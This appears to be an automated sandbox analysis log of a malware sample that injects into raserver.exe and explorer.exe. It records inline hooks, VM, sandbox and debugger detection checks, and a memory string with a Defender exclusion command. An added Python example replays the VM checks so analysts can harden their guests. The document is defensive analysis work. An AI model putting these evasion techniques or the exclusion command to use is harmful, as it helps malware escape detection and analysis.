Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_019AD0D1 push ecx; ret (3_2_019AD0E4)
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 12_2_04B5D0D1 push ecx; ret (12_2_04B5D0E4)
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 12_2_00A980F7 pushad ; retf (12_2_00A980FC)
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 12_2_00AAD069 push esi; ret (12_2_00AAD067)
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 12_2_00AA69F6 push eax; iretd (12_2_00AA69F7)
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 12_2_00AA69CD push ecx; iretd (12_2_00AA69D4)
Source: initial sample | Static PE information: section name: .text entropy: 7.68116376135

          Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xE9
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Process information set: NOOPENFILEERRORBOX (35 identical entries)
Source: C:\Windows\SysWOW64\raserver.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match | File source: 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: XhU4EXUp0x.exe PID: 6968, type: MEMORY
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: XhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: +0 rdtsc; +2 xor ecx, ecx; +4 add ecx, eax; +6 rdtsc
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: +0 rdtsc; +2 xor ecx, ecx; +4 add ecx, eax; +6 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe | RDTSC instruction interceptor: First address: 0000000000A998E4 second address: 0000000000A998EA instructions: +0 rdtsc; +2 xor ecx, ecx; +4 add ecx, eax; +6 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe | RDTSC instruction interceptor: First address: 0000000000A99B4E second address: 0000000000A99B54 instructions: +0 rdtsc; +2 xor ecx, ecx; +4 add ecx, eax; +6 rdtsc
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_00409A80 rdtsc
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Thread delayed: delay time: 922337203685477 (2 entries)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe TID: 6972 | Thread sleep time: -104441s >= -30000s
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe TID: 7020 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe TID: 2016 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 3220 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\raserver.exe TID: 6964 | Thread sleep time: -65000s >= -30000s
Source: C:\Windows\explorer.exe | Last function: Thread delayed (2 entries)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Thread delayed: delay time: 104441
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Thread delayed: delay time: 922337203685477 (2 entries)
Source: explorer.exe, 00000005.00000000.680569789.000000000A868000.00000004.00000001.sdmp | Binary or memory string: SI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI`=
Source: XhU4EXUp0x.exe, 00000000.00000002.653357371.0000000000A9F000.00000004.00000020.sdmp | Binary or memory string: VMware
Source: explorer.exe, 00000005.00000000.669123730.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000005.00000000.676990753.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.677547132.000000000A716000.00000004.00000001.sdmp | Binary or memory string: War&Prod_VMware_SATAa
Source: XhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmp | Binary or memory string: VMWARE
Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000005.00000000.677547132.000000000A716000.00000004.00000001.sdmp | Binary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&d
Source: explorer.exe, 00000005.00000000.697429263.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000005.00000000.677547132.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: XhU4EXUp0x.exe, 00000000.00000002.653357371.0000000000A9F000.00000004.00000020.sdmp | Binary or memory string: Win32_VideoController(Standard display types)VMwareCWYACNw
Source: explorer.exe, 00000005.00000000.669123730.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: XhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: explorer.exe, 00000005.00000000.677896891.000000000A784000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: XhU4EXUp0x.exe, 00000000.00000002.653357371.0000000000A9F000.00000004.00000020.sdmp | Binary or memory string: Win32_VideoController(Standard display types)VMwareCWYACNDAWin32_VideoController92RGKB5VVideoController120060621000000.000000-00068978660display.infMSBDACRVZ4Z54PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsAXM45XBV>K
Source: XhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: XhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmp | Binary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000005.00000000.669704877.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: explorer.exe, 00000005.00000000.669123730.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: XhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmp | Binary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000005.00000000.669123730.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
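The registry values queried above, the Win32_VideoController WMI query, the VMware Tools key and path, and the SbieDll.dll / WINE_GET_UNIX_FILE_NAME strings together form the sample's VM and sandbox fingerprint. The following is an added example, not code from the report or the sample, that replays those checks against a snapshot of an analysis VM so an analyst can see which artifacts would give the guest away. The registry paths and value names are the ones the report lists; the keyword set goes slightly beyond the report (which only shows VMware strings) to the other hypervisor names such checks usually cover. Both snapshots are constructed; a live collector using winreg and WMI is assumed and not included.

```python
"""Added example: replay this sample's VM/sandbox checks against a snapshot of
the analysis guest.  Registry paths and value names come from the report's
"Registry key queried" lines and the key paths in its memory strings; the
snapshots below are constructed, not collected from a real machine."""
import re

# (key, value name) pairs the sample reads.
REG_CHECKS = [
    (r"HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0", "Identifier"),
    (r"HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0", "Identifier"),
    (r"HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0", "Identifier"),
    (r"HKLM\HARDWARE\DESCRIPTION\System", "SystemBiosVersion"),
    (r"HKLM\HARDWARE\DESCRIPTION\System", "VideoBiosVersion"),
    (r"HKLM\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000", "DriverDesc"),
    (r"HKLM\SYSTEM\ControlSet001\Services\Disk\Enum", "0"),
    (r"HKLM\SOFTWARE\VMware, Inc.\VMware Tools", "InstallPath"),
]
# The report shows VMware strings only; the other names are the usual generalisation.
VM_WORDS = re.compile(r"vmware|virtualbox|vbox|qemu", re.IGNORECASE)
SANDBOX_MODULES = {"sbiedll.dll"}            # Sandboxie, named in the sample's strings
WINE_EXPORTS = {"wine_get_unix_file_name"}   # Wine-only kernel32 export, also in the strings


def vm_indicators(snapshot):
    """Return the artifacts that would make this sample conclude it runs in a VM or sandbox."""
    hits = []
    reg = {k.lower(): v for k, v in snapshot.get("registry", {}).items()}
    for key, name in REG_CHECKS:
        val = reg.get(f"{key}\\{name}".lower())
        if val is not None and VM_WORDS.search(str(val)):
            hits.append(f"registry {key}\\{name} = {val!r}")
    for ctrl in snapshot.get("video_controllers", []):     # SELECT * FROM Win32_VideoController
        if VM_WORDS.search(ctrl):
            hits.append(f"Win32_VideoController.Name = {ctrl!r}")
    for mod in snapshot.get("modules", []):                # modules loaded in the sample's process
        if mod.lower() in SANDBOX_MODULES:
            hits.append(f"loaded module {mod}")
    for exp in snapshot.get("kernel32_exports", []):       # GetProcAddress probe for Wine
        if exp.lower() in WINE_EXPORTS:
            hits.append(f"kernel32 export {exp}")
    return hits


# Constructed snapshot of an untouched VMware guest (values are plausible, not captured).
STOCK_VMWARE_GUEST = {
    "registry": {
        r"HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0\Identifier":
            "VMware, VMware Virtual S SCSI Disk Device",
        r"HKLM\HARDWARE\DESCRIPTION\System\SystemBiosVersion": "INTEL  - 6040000 PhoenixBIOS 4.0 Release 6.0",
        r"HKLM\HARDWARE\DESCRIPTION\System\VideoBiosVersion": "VMware SVGA II",
        r"HKLM\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc":
            "VMware SVGA 3D",
        r"HKLM\SYSTEM\ControlSet001\Services\Disk\Enum\0":
            r"SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000",
        r"HKLM\SOFTWARE\VMware, Inc.\VMware Tools\InstallPath": "C:\\Program Files\\VMware\\VMware Tools\\",
    },
    "video_controllers": ["VMware SVGA II"],
    "modules": ["ntdll.dll", "kernel32.dll"],
    "kernel32_exports": ["CreateFileW", "GetProcAddress"],
}

# Constructed snapshot of the same guest after the artifacts are renamed or removed.
HARDENED_GUEST = {
    "registry": {
        r"HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0\Identifier":
            "SAMSUNG SSD 870 EVO SCSI Disk Device",
        r"HKLM\HARDWARE\DESCRIPTION\System\SystemBiosVersion": "DELL   - 1072009",
        r"HKLM\HARDWARE\DESCRIPTION\System\VideoBiosVersion": "Hardware Version 0",
        r"HKLM\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc":
            "Intel(R) UHD Graphics 630",
        r"HKLM\SYSTEM\ControlSet001\Services\Disk\Enum\0":
            r"SCSI\Disk&Ven_SAMSUNG&Prod_SSD_870_EVO\4&2a3b1c5d&0&000000",
    },
    "video_controllers": ["Intel(R) UHD Graphics 630"],
    "modules": ["ntdll.dll", "kernel32.dll"],
    "kernel32_exports": ["CreateFileW", "GetProcAddress"],
}


if __name__ == "__main__":
    for name, snap in (("stock", STOCK_VMWARE_GUEST), ("hardened", HARDENED_GUEST)):
        print(name, vm_indicators(snap))
```

The stock snapshot trips six of the checks; the hardened one trips none until a sandbox module such as SbieDll.dll is added to its module list. Note that the sample queries Scsi Port 0, 1 and 2: renaming the Identifier on port 0 alone is not enough if the virtual disk sits on another port.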
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\raserver.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_00409A80 rdtsc
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0040ACC0 LdrLoadDll
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_01A149A4 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_01982990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0197C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0198A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_019D51BE mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_019799BF mov ecx, dword ptr fs:[00000030h] (8 occurrences); mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_019861A0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_019D69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0195B1E1 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_019E41E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_01959100 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0198513A mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_01974120 mov eax, dword ptr fs:[00000030h] (4 occurrences); mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0197B944 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0195B171 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0195C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_01959080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_019D3884 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0198F0BF mov ecx, dword ptr fs:[00000030h]; mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_019990AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_019820A0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_019EB8D0 mov eax, dword ptr fs:[00000030h] (5 occurrences); mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0197B8E4 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_019540E1 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_019558EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_019D7016 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0197A830 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0198002D mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_01A24015 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0196B02A mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_01970050 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_01A12073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_01A21074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_01A25BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0198B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_01982397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_01961B8F mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_01A0D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_01A1138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_01984BAD mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_019D53CA mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_019803E2 mov eax, dword ptr fs:[00000030h] (5 occurrences)
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019803E2 mov eax, dword ptr fs:[00000030h]3_2_019803E2
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197DBE9 mov eax, dword ptr fs:[00000030h]3_2_0197DBE9
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1131B mov eax, dword ptr fs:[00000030h]3_2_01A1131B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195F358 mov eax, dword ptr fs:[00000030h]3_2_0195F358
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195DB40 mov eax, dword ptr fs:[00000030h]3_2_0195DB40
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01983B7A mov eax, dword ptr fs:[00000030h]3_2_01983B7A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01983B7A mov eax, dword ptr fs:[00000030h]3_2_01983B7A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195DB60 mov ecx, dword ptr fs:[00000030h]3_2_0195DB60
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A28B58 mov eax, dword ptr fs:[00000030h]3_2_01A28B58
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198D294 mov eax, dword ptr fs:[00000030h]3_2_0198D294
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198D294 mov eax, dword ptr fs:[00000030h]3_2_0198D294
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196AAB0 mov eax, dword ptr fs:[00000030h]3_2_0196AAB0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196AAB0 mov eax, dword ptr fs:[00000030h]3_2_0196AAB0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198FAB0 mov eax, dword ptr fs:[00000030h]3_2_0198FAB0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019552A5 mov eax, dword ptr fs:[00000030h]3_2_019552A5
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019552A5 mov eax, dword ptr fs:[00000030h]3_2_019552A5
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019552A5 mov eax, dword ptr fs:[00000030h]3_2_019552A5
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019552A5 mov eax, dword ptr fs:[00000030h]3_2_019552A5
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019552A5 mov eax, dword ptr fs:[00000030h]3_2_019552A5
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01982ACB mov eax, dword ptr fs:[00000030h]3_2_01982ACB
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01982AE4 mov eax, dword ptr fs:[00000030h]3_2_01982AE4
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195AA16 mov eax, dword ptr fs:[00000030h]3_2_0195AA16
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195AA16 mov eax, dword ptr fs:[00000030h]3_2_0195AA16
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01955210 mov eax, dword ptr fs:[00000030h]3_2_01955210
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01955210 mov ecx, dword ptr fs:[00000030h]3_2_01955210
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01955210 mov eax, dword ptr fs:[00000030h]3_2_01955210
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01955210 mov eax, dword ptr fs:[00000030h]3_2_01955210
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01973A1C mov eax, dword ptr fs:[00000030h]3_2_01973A1C
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01968A0A mov eax, dword ptr fs:[00000030h]3_2_01968A0A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01994A2C mov eax, dword ptr fs:[00000030h]3_2_01994A2C
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01994A2C mov eax, dword ptr fs:[00000030h]3_2_01994A2C
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1AA16 mov eax, dword ptr fs:[00000030h]3_2_01A1AA16
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1AA16 mov eax, dword ptr fs:[00000030h]3_2_01A1AA16
